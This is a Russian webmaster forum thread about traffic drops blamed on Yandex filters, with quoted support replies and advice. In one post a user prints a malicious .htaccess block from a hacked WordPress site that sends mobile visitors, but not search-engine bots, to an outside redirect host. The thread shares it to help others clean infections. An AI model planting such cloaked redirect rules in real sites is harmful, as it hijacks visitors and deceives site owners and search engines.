Новый фильтр Яндекса?

golf4man
На сайте с 16.08.2010
Offline
123
#331
KOMM:
Что такое переспам не по наслышке знаю. Процент ключей соблюдается строго.

Увы, но за эти 6 лет Вы так и не пересмотрели свое отношение к антиспаму, а зря.

Поиск не стоит на месте, а проценты остались году эдак в 2010 :)

RV
На сайте с 28.12.2010
Offline
24
#332

третий раз писал Платонам, вот ответ:

"По факту Вашего обращения в службу поддержки нами была проведена проверка корректности работы алгоритма ранжирования по указанным Вами запросам. Каких бы то ни было ошибок или сбоев выявлено не было.

С нашей стороны не возникает проблем также и с указанным Вами сайтом: он нормально проиндексирован, участвует в поиске и находится по релевантным запросам пользователей.

Комментировать же отдельные свойства сайта, в том числе и, почему конкретный сайт не находится в поиске по конкретному запросу, мы не можем, эта деятельность выходит за рамки наших задач. "

Не сознаются, как партизаны. Санкция есть. Я точно знаю. Только вот за что - не пойму!

С уважением, Вадим!
Diktator85
На сайте с 25.03.2010
Offline
39
#333
ridic_v:
третий раз писал Платонам, вот ответ:

"По факту Вашего обращения в службу поддержки нами была проведена проверка корректности работы алгоритма ранжирования по указанным Вами запросам. Каких бы то ни было ошибок или сбоев выявлено не было.

С нашей стороны не возникает проблем также и с указанным Вами сайтом: он нормально проиндексирован, участвует в поиске и находится по релевантным запросам пользователей.

Комментировать же отдельные свойства сайта, в том числе и, почему конкретный сайт не находится в поиске по конкретному запросу, мы не можем, эта деятельность выходит за рамки наших задач. "


Не сознаются, как партизаны. Санкция есть. Я точно знаю. Только вот за что - не пойму!

Да мне также отвечали, я их письмами задалбывал просто. В итоге уже скатывались к такому ответу "К сожалению, мы ничем не можем вам помочь. Санкции к сайту не применяются".

RV
На сайте с 28.12.2010
Offline
24
#334
Diktator85:
Да мне также отвечали, я их письмами задалбывал просто. В итоге уже скатывались к такому ответу "К сожалению, мы ничем не можем вам помочь. Санкции к сайту не применяются".

В целом это же написано и мне, только между строк. Второй раз отвечали более прямо, что не их это проблема. Решений пока не вижу. Ждать придется. Ну и посмотрим, что даст 301-редирект на Вашем примере.

hexacell
На сайте с 10.12.2010
Offline
65
#335

Кажется я выяснил причину падения трафа на своем сайте.

В общем в .htaccess была вот такая бяка (что еще примечательно - дата изменеия файла - 17 окт, а трафик обвалился 20-го.):

RewriteEngine on
RewriteCond %{HTTP_USER_AGENT} (android|midp|j2me|symbian|series\ 60|symbos|windows\ mobile|windows\ ce|ppc|smartphone|blackberry|mtk|bada|windows\ phone) [NC]
RewriteCond %{HTTP_USER_AGENT} !(accoona|ia_archiver|antabot|ask\ jeeves|baidu|dcpbot|eltaindexer|feedfetcher|gamespy|gigabot|googlebot|gsa-crawler|grub-client|gulper|slurp|mihalism|msnbot|worldindexer|ooyyo|pagebull|scooter|w3c_validator|jigsaw|webalta|yahoofeedseeker|yahoo!\ slurp|mmcrawler|yandexbot|yandeximages|yandexvideo|yandexmedia|yandexblogs|yandexaddurl|yandexfavicons|yandexdirect|yandexmetrika|yandexcatalog|yandexnews|yandeximageresizer) [NC]
RewriteRule (.*) httр://sn-update.com/s/8196 [L,R=302]

всё это редиректит весь мобильный трафик на 94mobi.com

Все лишнее я удалил и поставил права на htaccess 444.

В инете пишут, что htaccess мог быть изменен на сервере, т.е кто-то получив, доступ к серверу, смог добраться до нескольких учетных записей и их файлов и сделать свое грязное дело.

Заказывал консультацию в Профит-Партнере, сказали, что еще антивирус ругается:

"Загрузка объектов содержащих вредноносную ссылку запрещено", затем пишет "объект заражен HEUR:Trojan.Script.Generic"

Какой именно антивирус такое сообщает не уточнили, думаю Касперский, т.к. мой NOD ничего не находит.

Я на вирусы сразу проверился после падения, но что тогда, что сейчас ни DrWeb, ни xseo.in/viruscan ничего не нашли. Кроме того проверка на безопасность по Google и Яндексу также не дала результата - его нет в списке опасных...

Так что рекомендую проверить свой .htaccess.

КВ
На сайте с 02.07.2012
Offline
47
#336

hexacell, Какой хостинг? Движок ВП наверно?

З.ы У тебя все еще вирус на сайте... и юзеров твоих заражает - гугли.

Удали вирус, обнови все движки на хосте, смени пасы...

hexacell
На сайте с 10.12.2010
Offline
65
#337

Кот в сапогах, хостинг - HostLife.net, движок, да, WP

Продолжаю искать, пока ничего.

PS Очень помог скрипт Ай-Болит.

FU
На сайте с 06.09.2012
Offline
8
#338

Извиняюсь, конечно, что не совсем по теме, но решил кое-чем поделиться. Скорее из разряда философского.

Недавно (наверное, как и вы) прочитал вот эту статью: /ru/news/13700

И, честно говоря, чувство подавленности, как у Джеффри Дж. Каца, только возросло. Но сказать хочу вот о чем: если даже западные (!) компании как Google позволяют себе такое поведение, то что говорить о Яндексе!? С его российскими корнями и соответствующими повадками. По большому счету это "Путин в сети". У него есть дубинка, наручники, ствол и он не стесняется этим всем арсеналом пользоваться на свое усмотрение... А на все правила и "простых смертных" (это как раз веб-мастера и прочий околоинтернетовский люд) плевал с высокой колокольни.

Конечно, искать причины, менять свои сайты, "ремонтировать" их - все это правильно. Но, судя по всему, эффект от этого чем-то напоминает заявления заграничных амбасад, резолюций СЕ и протестных выступлений местных общественных организаций... То бишь, практически нулевой.

Если Володя решил, то значит решил...

P.S.: сам из числа, так сказать, пострадавших. Более подробно отписывался в теме "Жесткий минус 18.08".

P.P.S.: Ничто не вечно, друзья. Будем надеяться, что эта вековая мудрость коснется и Яндекса... :))

А
На сайте с 10.11.2012
Offline
0
#339
FIL_UA:
Будем надеяться, что эта вековая мудрость коснется и Яндекса.

и он всех забанит)))

BigBad
На сайте с 01.09.2009
Offline
104
#340
hexacell:
антивирус ругается

Проверяйте JS файлы. В конце каждого будет дописана строка или две.

Пароли на хостинг сменить обязательно.

Ловить эти вирусы можно через Microsoft Security Essentials.

У вас на компьютере есть или был троян, который выслал доступ FTP "куда надо".

Аренда коттеджей на сутки в Екатеринбурге ( https://omodom.com )

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий